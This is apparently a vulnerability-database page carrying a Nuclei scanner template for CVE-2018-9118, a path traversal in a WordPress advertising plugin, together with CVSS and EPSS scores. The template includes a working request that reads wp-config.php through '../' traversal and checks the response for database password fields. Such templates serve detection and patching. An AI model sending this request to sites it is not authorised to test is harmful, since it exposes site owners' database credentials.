Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-9118
HistoryJul 15, 2021 - 9:59 a.m.

WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion

2021-07-1509:59:40
ProjectDiscovery
github.com
7

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.07 Low

EPSS

Percentile

94.0%

WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
id: CVE-2018-9118

info:
  name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation.
  remediation: |
    Upgrade to 4.1.15.
  reference:
    - https://www.exploit-db.com/exploits/44417
    - https://wpvulndb.com/vulnerabilities/9056
    - https://99robots.com/docs/wp-background-takeover-advertisements/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9118
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-9118
    cwe-id: CWE-22
    epss-score: 0.07018
    epss-percentile: 0.93949
    cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: 99robots
    product: wp_background_takeover_advertisements
    framework: wordpress
  tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_HOST"
          - "The base configurations of the WordPress"
        condition: and
# digest: 4a0a004730450220015beb169f06bde24fa211fe065c528759c245a5978b7aab3ecf489647f6b127022100b7604378240ccca7a0d322d620e27549216b34324349d21da959b1bd303f92e1:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.07 Low

EPSS

Percentile

94.0%